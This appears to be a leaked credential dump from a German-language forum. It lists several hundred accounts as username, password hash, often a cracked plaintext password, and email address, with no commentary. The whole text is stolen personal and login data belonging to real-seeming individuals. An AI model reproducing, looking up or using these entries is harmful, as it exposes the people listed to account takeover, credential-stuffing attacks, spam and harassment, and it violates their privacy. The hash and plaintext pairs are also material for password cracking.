+sunrise:968f0e84e05e4d1ebc80965e2e780ba4e6c5394b:: +NoLimits:8d00501cde2d7bb38c8b6f080bfd64da:: +MatriX1500:ecae22030a283fe1e5d238723c754dc2ddba2085:vbasic: +store:09b578ff384a1cf8e587ebd801191000:: +sw33t_h4ze:03c71a731ff623634c8d59e122b567bcd057d092::sw33t_h4ze@gmx.de +3lite:7129d44c7ba6d75471c270cdecaa0f1ebd52e977:verwesung:nanoxid17@googlemail.com +Luoo:47750d518a8157671c5e57917d10f3ed806fd48e::Luoo@mmorpg-core.com +XxDiCkNxX:3db168bd0a7077b06730f3b08359cc816bf8279f::XxDicknxX@web.de +kazuya:a4558557a212de4f7f76b31f799111ad::kazuya@list.ru +mikagg:d23df347effdcb113f752bf163343c440c57d6a9::mg4life_187@hotmail.de +JackTheRipper:e1dfafb7b0ad9c6026fd0e1a035fa3d72537e131:789852:jack@trash-mail.com +souliloquist:222c4af68b1051b86dfc4027657ada0d552f6474:: +Freak19:786c4f8f151304a2eb3fed16f06b4dc9::egg-clan@live.de +Orphos_Cloud:c045b21eb5a76ac100ea1dfa506633a6:: +Sine:2e0ac565e15e6e156ec5a986bb8af64001565f54:8737434: +zameit:e19928315af07638d7ee8371a825fcf567c4bd83:: +cashier:fe7b5a26eef63a62fe559a453e0a90e8:: +Fickmaus:0a547e5006d1dc444f50c03e7f761977:: +cfc-hph02:bd74d35974277dede93d5f07d7e49949::cfc-hph02@live.de +Pla3er:077e440ccc36d47c0ef80ebffc1d7dd227188e83::anegelo_abrami@hotmail.de +aVo!D.cc:311249a92443aaed7b4ddf834e3f4243e8644c41:: +kleinkoe:13ecc0af65d65ac56186983c72b3fed84938871b:labtec:kleinkoe@yahoo.de +silver54:c5e94b7c9449373086d643ba367a4cef::silver_54@web.de +oTTi:5483f0f6ad5d5ec2e707bcb46624db799fe351e5:qwe123:gaosp@oleco.net +franky:48981e226366ce60539bb1fd221eb88affca2bb1::franky@z1p.biz +Zera:62f7c8e5c7e2485af6bf206149714b2307d34bc7::Jill84Uscanga188@hotmail.com +style-:4e551c717bb9840219479b6b571a1a00::directionesl@web.de +Black-Hack:f442a4cdbaaf73a60df25f6aa2ba2a4ec0238271:123456789:paypure@web.de +0-saft:755ecca10ad3441152f8b3412a1b22c31b076c5d:ali123:elkadisabhi@live.de +v.Realistic:223e9b7e20ee5f60f4d47c1cf60a4583754f258c::recolty@vip-style.org +noob@pc:be6b3182ccc3cd7779202ae9dba478ae9058c86d:killah:Jens-B_@gmx.de +mawter:ee295f4b9c6eab82de9e5a0980993bf80550d938::r3tched@web.de +Lestat:6b71bc85dce4de072425b6278b0cd6dbbd3e4259:Mikrowelle:achmed1991xxx@yahoo.de +2PaCalyPsEnOw:3acda559c6f0f9bf8af2fe51cd949ba36f253868::daplayamarco@mail.ru +freakbyte:f1f85096afd98d9f2bf7ac5316875c55::annamueller921@web.de +Scoore:95976ac0b9fae2f51594705fafd48bc8::yallawow@gmx.de +geopavice:97eadfd4bafeee94ddf31cc40febee37f0181548::shroff012@gmail.com +Seri0us:23a8af970aa8c4aad275c5373b5db1b657f2f514:superman1:bjoernbmx@hotmail.de +n__N:bcd73b7f752d2c3dfc837b8a2f40e34d::really@z1p.biz +Cronic@l:9aa8d80ea273215248f4416f10df773d7c7e4cff:14725Pin:blacksideofchaos@aol.de +mr.pow:1ee0c94ccfed02293022e1a3fbce36f3::mrpow@sandelf.de +mosa01:8cc6eb9b1a5d9740b85e32715e08f12886f58bd5:spima94cet:boris.floricic@gmail.com +mc_lovin:d9c235647a8132e5193ad2ab74f4ff0d952f988c::smelly_o@rocketmail.com +bvbhelfer:cb27b5789180bc3a8a97be29986811e4::duplo201@gmx.de +emco:5945e1c3065da1595152ccc5a4b52ff4::b3849453@uggsrock.com +Micha9669:6a735dacbd327db2df93e3ac50257253::vega_ownage@hotmail.com +CCN2:e7332dadd3bd8fc83e26c6765aa24f77::pate11@gmx.de +Sp3ziaL:fda9a5d05e9dc22ffada20cb60bf5684782b615a:1a62b7c:fresh@trash-mail.com +j9ker87:889435156a4c35d95d7a2fa31bc8d71d23ee6738::j9ker87@web.de +Lorenz:91b4c4fe50a0a4e329cfd1cb471c7841::dmdobrovol46@gmail.com +Rambo02:b71a7ddcb5954750a91894e9edceddb21d78fa26:deimudda:ramazan.akbulut@gmx.de +Tweaknap:2920829c7b655afed9e0752d398c413965790992:210599:hackersqbest@web.de +Airen:b3f2cf8599b068f38cc9754d2c5f1835cd3c2c49::airenn@web.de +popaj:336e68c3e3384ad276781e77bdc69f12f2764a56:markohinho:majstoreee@hotmail.com +heineken16k:8c72a107b78cd5e87e7591a9d821845eeafd25e7:178910:heineken16k@hotmail.ru +versesone:428c02dfb1a6fa2561ef81af3b2d5f413c6ce9a7::versesone@gmx.de +Blueizi:a0f25e391670a3ea135fb174891f279e::blue_z@live.de +meyer226:79e1c2b4e6b7de233eb0b896c8ffba4d::jude12@web.de +k!LLu:ee3e3588dec6915bc53e39fbc6c6d59e::killu@killu.to +SpiceBoy:42e07110719475aa6b65b057dc3df542::spiceboy@trash-mail.com +Silberklinge:85afe33399a22f86009e36efc4b31f85::silberklinge987654321@spambog.com +Sinister:34725e75dfa42fbe6993205c5f927cd5ad5c100b:Latein123:Michael_schorr@gmx.de +Celebrate:99a8dc4215560d5eae397cd0d834040c842b0f9f:asdf1234:Nieder-Olm@gmx.net +SynStorm:55ed72a80d41918e4bab3cdd3f08b3069ac3cb8e::hunterxx0xx@web.de +king38:7b57fb423c42ac0e41ddcfd13f54e08a::hackedbyking@live.de +held:58e8d41b84d03853582b29cf6f90c21e::chmer2993a@hotmail.de +bentley:553b09aeafc4b2dd148b877d8719b78adec14fc8::cityofgod@qip.ru +endzeit:af6f5d91d6ca7f135cde6f8497b42751c2f1c60e::lutschie@web.de +test:8719216e7dd2c0139aecc365d337aae4::fixo@trash-mail.com +DjKisune:0ed3506209bc4211af7b28f5b18ee46082fb2e41:cd300c83:djkisune@mail.3dl.am +doofxd:45ee9d4ed1e5ea79d04bf5b24e39e5c71c85b16f::teenemily18@yahoo.de +Relentless:b20bb41466984bb25700138a41fc3a1f::b3975295@uggsrock.com +greg212:1e413b64105ebf05b0054b5e9c527f14::gregorywoods_a@yahoo.com +haxx0rrizz9r:56ac49740bc1380588d4b939fd2ae80fe01595eb::hoelmhacker00@web.de +Godlike2k:327a7f1e01bc8df1b6795cfe6b7b8ae56158780a::simon.grinder@freenet.de +kk29:d7c8ce4f57ff4bb2b6ff198582946f75::sss846@hotmail.com +Rheinhessen:9847881f9e3a951e352ef86b3194add4::Rheinhessen91@gmx.de +TheBossThomas:6fb55f9c329ec0950ff798f15fcde809::Thomas.Zielonka@gmx.de +kr0x:cd6f982bf13af7eff002bcedd97464bb0d13dbd1:asdf123:bl444@gmx.de +n00rd:ddf3151a6aaa8a5cd3758395cb3d0be2ea9cd16e::obsession@hush.ai +roy02:3da4343ad76651b5a3fc345371db23159808cc2f:mokimoki:uemit619@hotmail.de +xian:98ab1a93eecbf62d9415d7be5d0efcea3258849f:mar27tin:xian@secure-mail.biz +magicx:f897a46ca25da5ab59e3d8c8993c272e::ottapego_34@yopmail.com +ArthurSpooner:94d7d48ba5ce74a67cce04feeebf340e38af5d47:spooner123:ragannes@gmail.com +Carlos71:57525aed8a8597be033850b533582b72::mausi.schoki@googlemail.com +Lexus:996d8c35ef38193fc3558d4d69d707dfd9397fe9::internet22111@web.de +dd7:a6ffe2ac9cc9d6f6ee5c337322646ba2ba67582a::dd7@7hack.net +davis_cc:12063719fb50b15682fd350674c6955a0020a2ad::david_polska007@hotmail.de +EraZoR:58b21999d98f2b0533253fb85d0b9b6a0c250ae4:werder4628:rrerazor@kuh.mu +Bangkok Noir:028bad538b5f14b59c4b7e19b4612af751dd48f2::patrick4president@hotmail.de +Splatter:ac38a21693cc013c7eb1f1a0342842c4::m.noack2008@web.de +Casanova:21c1184bec6961f8b8bd6a3fb40fde60b1d9b0a7::a3870502@owlpic.com +rsN:70a8afbedb9a4867f96a7e101c80e028::Penis@google.de +micro:4231ceb72f9c1f329f5abac805b67fdd5ee6cafb::rymyldan@mail.ru +shikarinmoto:d5d47fbd7d6de8bd97a7df4ee55e5185470ac061::shikarinmoto@qip.ru +Cyberus:3df6dd1d96c1bbb1a8db81011638c77275edf966::fm.cyberus@gmail.com +sp7:18234cd0a9f7e048acc4dcdd81e390ff0e57e155:nina123:spartanier7777@gmail.com +F-SYS:43413df72b375fec257a7812c46d50e5::schiffi007@hotmail.de +alpha210:a33fd2501046fc80afee5f443335821904fc0c84::marcello-sanero@gmx.de +jeiN:c4963fec007809044d34ac1fc2d2d69796cbc8e4::Liveric@web.de +Ineedmoney:41fc2cb701f05cef0475abd7b7186cc833e96bf4:31031985:Ineedmoney19@web.de +djiNN:cb8a9e6d9b40ef21aa9b0149634a3eac9c3e2625::djiNNONE@web.de +pixelg0tt:fb1d1cad27697072e7dbd6bb0db9feaae11bd161:abcde123:pixelg0tt@live.de +Einsam01:10af823fa87001c4588becb558d277acfacb67f9::eismann-online@gmx.de +blubi:49a8e8be5d691428ed4da789802fe78ed1d23ce5::l2german@hotmail.de +0wnaa:ff2305ebcc08aae6e15cb47295e3d549::owna123@mail.3dl.am +Pozilei110:966785b73fae35907b8e7ff2fc6a440a::angeltoplay@hotmail.de +Conn0r:dd31cf1dc2289193d4300eb9a09fff3affaf5eb7::conn0r@safe-mail.net +Du3en:b7731f2b5d73269c4937447ce347270f0dab42d4::du3en@funli.de +p0lat:6ac40636792202c97b937f28ed9fcf46::loled@trash-mail.com +90.:5889bb9213bddc6a82cebaaeeb7035c94032e827:geben321:dennis2@habbomail.net +Pasion1988:12688ab3a3312d12e57d7d332d1ae2ead1527d7b::pasion1988@googlemail.com +Samsung:eec3351cd9d4bb528445ce4f76a3eaa590c311ba:145678:hoden0815@hush.com +Mule:7df68470e195ca9375c6894312f282394b9880e9::pokerz@web.de +gster:4a2f6296eae47a39fe7d072b2903574f6496bf39:selian94:gster@trash-mail.com +hmmi:a6b386f8649a2c2ff49c9938a2a7717397276382::kijiji-123@live.de +@llst4r:35bcdc24fc0428be1e5f9b3f7d789564::allstar@mailinator.com +BA!!:5592a4e8437e313e5ad1d8aec32d94c5f69ad697:Nudel111:Balica@mail.3dl.am +infamous:4731945b423034503303c36a8fcc6db9::infamous@secure-mail.biz +Bonbergol:5fbe05123bd23bdeae59dcf6ddc916c79d6a4fc6:calabria:bonbergol@web.de +Radeon:fa08c3f57b67ac5aba64d6feba4dd619452db1fd::nvmme@web.de +xxbsxe:64c8034938ac9a5748f30c4d67c14c779a47747b::xxbsxe@hush.com +ghosty:cab24d496a4e3b9ebbbc4a1a8deb87fb9cbff19b:332299:jumper252@web.de +eduardx:350ea694a75f5b7855e919f341767170::eduardx@gmx.de +loader:bbf99eff90bf3f5de99ee79623908e77::serbische_wurst@hotmail.de +rupsen:115743ef244ca845b3d8683fa7c5ecd1::doc.prom88@pochta.ru +Rap3:31783bcd16a2d6c32b729f70f161db9a::tomalberslucky9@googlemail.com +tt95:37fcc6eb987499fcd6d2c3776a718fe1::tobsy@live.de +Cyler:790c83e2157920ae46c01eda3380b69e5f6c7909::Cyler1993@web.de +rEvAnCe:9ce1ff81a26f16f7ac080d02c29215cc2c0d0c96:123456:Freak19921@web.de +skAi:d9fdac6500dd7c0f117ee2dd8b5e941340a95c43:lala34:z3ro2007@web.de +aCiDzOrN:65454c8d22d1bfebc476282752467db1b9061fb2:Masters:proxyservices@host.sk +Anilman1:41f454c87738fb0f149a5be4785cbfa5::Anilman@hotmail.de +JimJones:6e7e3d127eab1d3b60032eda27c2d31439ec3a5e::wachs@safe-mail.net +coolio:3ce2e12d19f20a99497b501b8d359d21ba48edb6:90251710:fakerinho@bk.ru +neuronet:8db08ebe5b96363b3c50c6e2b087e4fc::haftrecht@web.de +Cy0n!X:92041f20ae39a77f7f8f2a66250c0fb50a151579:a1s2d3f4:habbo12211@web.de +T.K|Day:8af8d2e6ddda9a8a5aed5c9167d9f4e24609d6f0:11ddos11:server123@mail.3dl.am +aerox123:6131c169a8753d158f1dda2c1586d9e09409fd61::hotandre1987@web.de +MrMarci:221904f30f194cea6b69904720a8602535d65114:Habboworld:Mr.Marci@hotmail.de +l4ble:18c3fdfadcb95c51ca9bf88315a7efdd7ecc25e2:logitech:l4ble@gmx.net +fstyle:3d0cd831e8ac1f1ea526a96086a19e0b5c92c289::homepage@mail15.com +ag4inst:e6349a0a605be4952e4f02347786ed69959ca559::against@z1p.biz +sensenmann:13235b1becb4722764c9e6c1bec67e31a1335416::ruhe-lustig@hushmail.me +Astroo:1136f7f29eb4b454fa37d6e0cef2102dc6453e44:qqq111111:1111111234@gmx.de +Garomer:5fc3431e23933c06bd6fe54e93b7b3eb::garomer@o2.pl +ayok:9ab0b508c309d38f5406a4862df34fa35561bf38:chip12:stevex@hotmail.de +beginner:1ea6a991fd7c2a7b0e0a55e83fc975debc6610a6:marvin1995:mr_007@hotmail.de +pr3dat0r:e83cd86726dc4601991361f37ec58657fce07051:123456:10minute@gmail.com +Sceneman:9c3178e8cd09353008f72913a8efaee9::andreas@yahoo.de +shibukii:f9ed9684ae8a076e1747af014b131fb2670ddb04:polo:eddyminator@web.de +Positiv:ff49525c622479f5546cabe4f35fe6c0::DicDoo@web.de +Black Widow09:159689ed34acdae6ba5ee31af0d490d7::salil@gmx.de +Adil:5e545c654670e1945322aa70ccf08d2ac5575879::hey42@hotmail.de +rerebelabt:f68de18514e1893e30892c336ef60e3ea0cfd126::luckluckback@gmx.de +midway:ed9b36022310157f8438b96c0840694e::midway_x33@yahoo.de +xNNNLL:a4c69ae9508005ee70ddf22e16be04d03c582631:mg1302:fabio-fesel@web.de +DooD:c1dd4ac419956bb777b5db52b46b532cae4f5837:21021991:istmirwayne2010@hotmail.de +Steven1989:86dda62dd2cea515330309bded83fa68::steven.simsik@live.de +KiiNGDeZz93:96da4078d171ce740eb56a7ebb0f700b::KDM13372@web.de +gigamesh:5436f15991040aab01ddd4e4ca8c4596::giga@yopmail.com +accs-dealer:5029d689a636896e1ad2b4c0846f5d88::harro-huebner@t-online.de +ny:3d41b64c7e3792c2bfa655bcdaa35f43::blubblub@trashmail.de +Vetolt;3:1dd565ab5a48b3e49f427c51e31e1a13c2eccc2a::Veto.L3@web.de +bigdaddy22:a11289fbc0447ed8ddaf57753fe87a6b97b92049:iphone:123@trash-mail.com +RaKTeC:4220f3a91069247de69250780fe7eca9974ba730::raktec13371@hushmail.com +mario1:2a50c50c715002535ba12a0a8c6c2d13::mario10@gmx.de +marijuana:18c09627c746ae7f810ca911a3f1234f635e72f7:12345678:yannik@gmx.bz +master09:e11dfb2a9cc1e79e9ce03469db3983a2ec2bf4dd:dortmund:master09827@hotmail.com +siedenburg2:629b6b64fa4587e657e1abeb439e88dfef81856a::pay@8p.se +john.doe:a1381e2ea0488df08fbaf3a32946c70528ea65c7:passwort:john.doe09@live.de +K1ngmoe:bb0bfb9c0f002efd4342584b43fd474c24b89880:ibdooa93:Gwendoline_31@web.de +chillah:36fe16098f0068ccead9d32d3fb013925f31b59f:167943:chillah21@web.de +funst3r:8274d03b26d13d28182a3cf5e8a72374c5b6c093::rdejong@freenet.de +cosmos:8adc5722edab56d31b1dd941198b664b::co0kiiie@hotmail.com +geespeed:9252f62c14bbfce3caab91905aa347ef::kill83bonner@trash-mail.com +Kincaid:d59c6e7d6da6fa31c4b1c237d5780c49::xXMrFightXx@web.de +Ghostt:e62a89b2ee2dfed956739bb12fce920460ed9e54:qaws:krisaa94@googlemail.com +CoderKenny:bef5b4ad04f74f94f5edfc3ae32c3bc8::spam33@ivacymail.com +digggah:7781b33afbc2875faa5e61df8ddab49436bba6b9:676767aa:z1g01990@web.de +DKahnKane:45a356484c71bdf53d4fa6642d0f9f5fe1bc0401:daniel88:DKahnKane@web.de +jajaja:1bf7f4feb8e65879f4fc9167397a6b3e41b9f337:12345678:larussogm@gmx.de +brain23:7b6b1fd85adb2eb636c082b65a2df6cce1334db8::maba003@googlemail.com +all.eyes:f07971a4242c6fd8d5c88d0b91c7838d9233f089::de@web.de +Styluxe:49814b01ecc0fe022278e3d48cb1e7bf8221e8e6:m.jordan:styluxe@hotmail.de +CyLoad:de8188b20bcce060ec33591e612306e5::natilus_arschx3@hotmail.de +xqin:0ae0434c61efb1123da58ff3833a320d::xqin@hotmail.de +manfred.ludolf:c3cdc6e4650e2a6f052047ca45a0b44cca9c0c7a::manfred.ludolf@freenet.de +JOKER:85e0e71511196cec00c3d401bf07ae36adc7dfb1:bennixxx:Phoenixchen@gmx.de +aeiko1:05c5e2b1926f05ffd5b3ccaee91eee61::d4-f473@web.de +scene_it:8a1923703fa31d762f67d3dcd1f2843b::privatemailing@secure-mail.biz +antr4x:5c39f7528213a0a4d2d2d83059a597cc::antr4x@safe-mail.net +MerryLu:7e7837a97002dbe18c08874d82ec18f3555ee12b::zorjar@web.de +Cello6:941561fc7ea7158f4b4996583084dffe::cello.6@web.de +mayer:bc5bd476018353de6798d181de6e3a1d0dede056:pallmall:j.mayer76@web.de +8xttxlzoOFPX:8843b5be2294ed36fcaafa68d78f7f08::foobar@nvds-mail.com +Nexis:1c65f53a7280060c9b074d7bfc21b324::Hannibal1993@web.de +blackknive605:0707ccf42a76753a2f041047eb0235f2::dominic-master@web.de +y2k:3e93ca6e0f28b40057194f89e264849bdbdaf1da::fileowner@gmail.com +dulla:b4962b679fba34912532a6010241110300ecf92f:meins1234:schlando@nm.ru +Mortalstrike:ffe340a7da6e781d2a45d5553002309b::killerzone1986@hushmail.com +razorrs:55a66179b5975bf2cebd7f175005b069::a3876722@owlpic.com +Nachtigall:f8af6226739378f08b2464c2f5cdce80::13nachtigall37@gmail.com +nick25:ab4a4d884c79840ed57320906e42cbe9::kloppi111@gmx.de +ClockiminatoR:7aa3b82791a61881d00e60ff07565159::southafricaaa2010@gmail.com +igoe:03366091ca750ecf093bd2d719474af1::igoe@gmx.de +RollingStone:2fd50c91fe00c0d6aa6ae627f4fc5a9199020b25::gdfrtgewretfger@web.de +rubberduck:54ae6a87140e56791352de1190e15ac20cdcfe76:jasmin2:zombieskill@googlemail.com +Spyed:cbf86978b769f8b130e1757bd1ddf5d3::dermitder_hupe@web.de +pinto:c2628b3eb9994d0ae833a0434467f5970c525382:malaka:murdoc_332@hotmail.com +FerayZe:b9d6393fbe086049dc864acf0a8755e7::italien444@googlemail.com +Bummer:e567a2395e44790f65853ff76d364d6bb5b2b3d1:Simpsons:Bummer5@gmx.de +Kellerbaum:b3937a17880b8bd131bfcf9e43c00608::christoph.bieber@web.de +Robmocdoc:e11802758e6a2541b5ba6e0c649af1551c75dad4::vossilein@hotmail.de +AgentZero:c18b0bc6ac8df6877f5afcd4d2d6f35d::ZeroGaming@hotmail.de +PKA:4c4ae9ecd30c0ab5d908fb29481e0bb8::fabio_blankenhorn@gmx.net +KanyeWest11:3bcd92cc3c6911d264200d612590f9278a2c36e8::PSEIA123@gmx.de +terrorstyle:5f40e83bd884a054750b5a44bde23c6e2420ab7d::everhatw@hotmail.com +finaleco:e75fb03936730675f20b8ca94e585115fa937f49:powerplay:cr1m3@web.de +d3alerstr33t:9ad3feb12fd0a7f1ebf0ac9207a20498::d3alter-str33t@live.de +Paysafer:7ee967c64ad66c2fa81a379223bd35d8::Paysafer@trash-mail.com +Petrisun:fc74187b0a66f9f654edb2a9d8658d130d4b0c57::patty-wendlandt@hotmail.de +buschnigga:41c6d440c351b54ff4b15b9799364bb1::bng@sandelf.de +AeroX91:ac1a18acf09fac5f6c1c8835725fcbd7637f4b55::prof.hack2009@googlemail.com +volcom:d948604cf0e96eb31c75a5b3045134236149849b:neworder:sc.volcom@googlemail.com +swissbeatz:6635b6562002b8bdf18831dfdd7bb227e661ca9a:hyundai:pataya@live.de +Iruel:39a2919077ee5dabe96ec36e2f31f441d8aba317::iruel@qip.ru +Bayburtluu69:037f67db396517339d298602eae821bf5ab04a86::playa_pascha@hotmail.de +Sveiven:739b7e7c14b4b9862fae5747d3530921d6dc4993:sven20:Vb-sveiven@Web.de +AES:033cb53be14807043a0fd9cc963dd2d5::AESc@spambog.com +dPLUS1337:476f6563c0f5953bd1f27a4768f57bea::1337ff@web.de +dumbass19:fceb6784fc16041bf0ea647443449aaf::youinme234@web.de +Furious:5ca8899ce3359c9c69c5a3eea5ee7ac0ec5e6eac::50001000@gmx.de +t0late:3c01abd310be4313cfac5d54f31730e44f642af6::t0late@web.de +deathmind:a2cc730dcf286f1be66a402fa2bd49db1fe6c6c2::i_hate_olaf@hotmail.de +Apo:7471682f00211e5a6739f16e102942ec::yohnny2oo9@yahoo.de +Master_Miggins:12e5242fd1b6cdf4cd367ed5707b4f56::facetoface79@web.de +En3my:49836106c9506b6ac01ecce86024d31c983f652d:ringer:marc_webersik@web.de +series:546b136cdd0f6e153932b94803966b4bbe5437d9::s3ries@mail.ru +Ownag3:1be04409537b7097cc37155e37cc963d7093251b:skater:Ownag3@seernage.com +SynTaxerr0r:076a11dc11a473f364f5306c604136d318e7e335:1337carder:vb-russel@web.de +falke:87e8ce7baa100a9ca22e5a8ab5ba3c09049872cd::ksharp@z1p.biz +dennyr888:af26a60c4b16d5d1fd56cba0939fa40c::thonczek@googlemail.com +petermeter:4b9189e354cdcf911f347a7183905a6f224ac428::email235629@20minutemail.com +stillerchiller:68a578b208cf892f28f62c1ac6d64f792e5c95f0::stillerchiller2010@googlemail.com +sure:13c0ef7e96a4f31f664c92964e1679a8c0670ffc::spammail1338@gmx.de +BullDDOSer:fe11f0ac3e4d5fbbd9a629ec3a3b25d442405d66::bullddoser@front.ru +tsd:122d9e084f3b69acd4c7eeaaf1a046ae::soulvibe@hotmail.de +Matix:1b6b3af2706b169e9c403861fd79cc1d::sven.schneida@mailde.de +Terroa:e9c9a0eaa78a31d579ea769912efb119dd3da66a::eslkanos@gmail.com +wannabe:d83f03fdfef2410953e185be984e16d0::fabian.markus@gmx.de +wac4:bc537c61cbb8cf61da7fc635e04f07d7779d65b8:wayne:webexplore@web.de +bobz:fb98edebb7f40ccdde5eb03894bb50fcd3306f8a::nanoxia@web.de +Sengi1000:e693e62cac165603689ddec4887abe60::stefanbaars@ymail.com +xfedo:2758606abc40536a6e7e10de517af7a8::ngame@live.de +MyOwnBusiness:7e014d584235a05302118fc52aeed4963d795773::oldbadsanta22@yahoo.de +iShaggy:7899b7c78fc48e4660ec9a95e9f69735::ishagge@web.de +Quazz:bed56e695f50876e502f32d6ec20ef66f9f7cb32::quazzn@gmail.com +MrNobody:d973090129f179dc7dbf97084d58ba523cc27c41::omfghacker@live.de +Kamast:6680bf57841b8d6f707e179205d5682aa43ac4b8:nicky001:Ratalor@googlemail.com +CowCain:340d0cad03f9963e06f8cdb2057691f7::cowcain@ivacymail.com +Resigned:ded50e14710c720ef47102c5e0c5c99a198984ec:schach:Resigned@live.de +lackom:31776923f8480f8934fb371b4f6ce547::11@22.de +dNyy:8284fded4a45ae3d4e0ef8ed04b735e5::x9x4x@web.de +Julix:0487fec6f4be1379132eb310e096642ecc166df6:julian:donchulio08@gmx.de +nextgeneration:1f1a2ef78c61ee2cbc5ec5a0d0e5c368::nextgeneration@Safe-mail.net +HeaVen:0e28264015a92624883a9038548b8a3d::heaVen@mail.ru +Degeneration:dd1b25a5a9b597a6e87dca7a6d85d9036708e081:hallo123:degeneration88@gmx.de +Morgen:8a6c92fad26a6b434c7ec3ef870d1b73f9061350::battal1234@mail.3dl.am +Makcim:d3d98d36534cebf57d23a19bd3d3bee3e0d3d7f8:hurricane2:hemp.town@gmx.net +iNeX:c3c5fe2f108cd913c6d54f8ddaee8987::lilop@hushmail.com +Sl4y:c0dfdaa1d94e23d3c32b0b78f816e8979c34bd15::email235633@20minutemail.com +kingkong2010:9409caf0790da1a80f57d60d7ca547d080461fc2::maria@web.de +Butch!:d0d3bb737425598694756a1f8c197700::butch@twinmail.de +DanBo:0b6ce3fd3ed8088582bcea5a3725563d::wiedergeburt@yahoo.de +bl4ckm4ge:0d192259cebb539bee56c5b705b17fffb517fe0e::bl4ckm4ge@qip.ru +whynot:46faeaa7076dbcc01a17b458b223b2a6::kkkslis@aol.com +manwe:bb88e46c381414609d7a3879c3eefee774596e21:test12345:m.komposch@networld.at +mrmandato:83412539de7d9992ef4b27148c07d2b9::ein-ganzer-mann@hotmail.de +J E Y Z:606e345ee7adc9660e9b75e6f71a26bbc856878c::thika_frankfurt@hotmail.de +Finlay:807812fb741861cfcef86f1d35313c32::Finlay@live.de +Public:92fc02e2e063c0bffd85111960d0373e::publicforall@hotmail.de +Dreierfick:ff1c8e0df3f70385807e1b3c8a324242f3657d19:1Harris3:dreierfick@web.de +kevsuck:aed7de4c51cdeb99a55f6c6da2efa81dd6e17a94::kevsuck@gmail.com +sevenokas:7a4964c4c05daf4a5b1bae20269e457e::sevenokas@live.de +itaLy:151a67e54d47d9943298336ab2f65a4df0fb9626:1234abcd:marnax@live.de +hammerhalde:359b2cef04b0131504554df2441ee3758b3a3301:leoinlove:steam100k@web.de +knackigeoma:fe21000053abbebc02e611cc9714ea7524f90e09:12345678:ocbistvollok@gmx.de +TeCru:39445f15c469a80f2d97042045ae69d1::baruk@web.de +Push4ward:92ce7f7ee95d1ca68d47de86d03d51f8d048141a:hallo123:push4ward@live.de +DonChaoz:3ac8730ddf83525545aff3a12724baedb850c501:Scooter:don@trash2009.com +Mecorix:9bd981d9fe77c03b2f4c28d8c9ab201d::mecroix@Safe-mail.net +AlphaOmega:00f1048869e476d732c26af36bc71c5a76fa92e2:d3d1c4t3d:P.U.R.E@keller-elite.com +djemc:1fbb93df1d4e2b86601f59d1e658374f10d00552::chilline@mail.3dl.am +polskaplaya:13454dac199681fde9bf609b26f85006ed02b1e4:popular1:deathmind2@web.de +Only:2af71299041d671dd28fa10f2de6b0fec03e88ff:onlyonly:rus.alex@hotmail.de +Silverhunter:68afeaed083c7dd20c2c491ea09d4e97::e842963@uggsrock.com +Kankardes:2197754e5781730b68ef13581c2d126afc9e117e::kankali@web.de +x3n:307c288003aaca6c53d3231504292837f72f6675::xen@xenmail.tk +crownJ:8cfb5b739a6f845775da72b8ccb20783::assssdf@hotmail.de +sohei1337:66ea5d6b1dc78afec9ab2c24e06ccd5377aa0189:02004465:marvin-dudi@msn.com +Daror:8beecfdabc320c8d98f29fd108a9bfdce4d35c24::daror@yopmail.com +RU1337:c71957939adba86f9ecce0bd78ea51693911ff67:hurensohn:rlgjrgjetgljstgjs@gmail.com +Darkvoid:be8a0c64f662d472da0c9433a4ea81c4::pisstyle07@yahoo.de +lowb1rd:22b865ceda42521c8ec324695c8acc8572f9ec9e:low123:blackout1@ivacymail.com +cracker8x:4d5fc1a465b95f83bfbcafa718b76b1782ee5239:nokia:xkarabacakx@gmail.com +secret:199cf2b5413b973a36515f216296ceeef96d4fa3::e940539@uggsrock.com +blokkmonsta:d99f26b323408e35669e8db00035a673::l33t3x@hotmail.ch +FreeStyle:4ab352fdad0afffab13e188a44c1bd536a262d03::007cu@web.de +Saroj:00d269ade45f1d088e28b1cf650be1220b7aa3df:adolf12:sarojcardoz@mailinator.com +Pozelei:0c10235334f648adf845fcf7eda2c602::dustin@fkleinert.de +MadMighty:7eaf0d698ce2df77066cf71f138ab8ec::tri0x82@googlemail.com +toriz:c8ac9e424bfe85c0fcc21788501d4044::toriz@hotmail.de +Bambus:7b4c18d2119c6d1be27492517eafd7c1a3f842b6::boom92@o2.pl +ccf:394765712f852a8e2916fab21c6273d9::ccf@hackermail.com +~zerocool~:505b04ce48752e9fb07723d21eb55226f0ea29b2:bla123:thomas@trash-mail.com +Nowo(2):dc885cf9e570b7c30273112a4897b582b0781acd:qweqweqwe:dontbug@hotmail.de +qoop:d9059506d65a942fcc08fc3d60f9f40900b1d269:jj8l:qoop@safe-mail.net +heur32:f5a956f002227499d033b54a0917fffe::heur32@hotmail.ru +FreshLike:16264972dc2184ce10bc4c6c4a97783c94bf8059:samsun55:acer55acer@live.de +cash0ut:e452a505fde9723463ee815d0fbddd95::cash0ut88@gmx.de +RublJow:31820528ca68e5e327f16f75bdffc8bda8896952:pspscore:mail@mc-designs.de +CrAcKa:507cef9c4773413a983f48306daa3b1aee653191:kokett:vincylicious@gmail.com +SceneListers:6e9a77efe7b98243c5af63a8b1c54912::Hab@keinse.de +Sn0X:766d34ca08853c7dd02d1a766f041976797cbaee::unkn0wner@yahoo.com +Meditonsin:1174613b68bd99d39dd26879a07ed2189ee173b5:1357924680:meditonsin@hush.com +scriptcheck:485e91cee959188cffce66670c1fa327::siksok99@yahoo.com +eSTArr.:7d59f1bb6f7ffb6e03c58b99fe94c81fdbdb2cf5:peter123:poll2010@abacho.de +siedenburg3:8910ceb5543f8531f0528d4059d539d4::pitrinusdietrich@freenet.de +PCFX:bbea3ed56a24696fb340cc4871233c17::pcfx@live.de +PurePass:2dbe5e5466e0dfeadad719d60bc2e00e6a035946::purepass@gawab.com +jeans:603d753f89510c2b234136d752a01503::yarak@spambog.com +druffi:3fe49747650a5dc41079d1bfb61b1f10::druffi3@gmx.de +emredinho:42450fe2f0e8cc59b08ba3ac457f1e4484d849fa:1234567890:markus.333@web.de +DerUlli:4f8b14b356b8f1bcec3c40ccb624f90e::DerUlli123@web.de +pacman:c7c4aae47429a496ed3e89e281264cfb46462e6e:123456:sdfds@web.de +bumaif:f0a9790479c65087d46c4448c6523cf5::GundulaWagner1@web.de +silvercircle:18480b8ca3b9b4dd3141766e4e17e576::silvercircleee@web.de +Wounder2:68535ee13d0e14e6917d1031612903c5::C_Moyzes@yahoo.de +mr.$:3f52a15c94b699989033d6521d2601ee09489435:allah:mr.$@hotmail.de 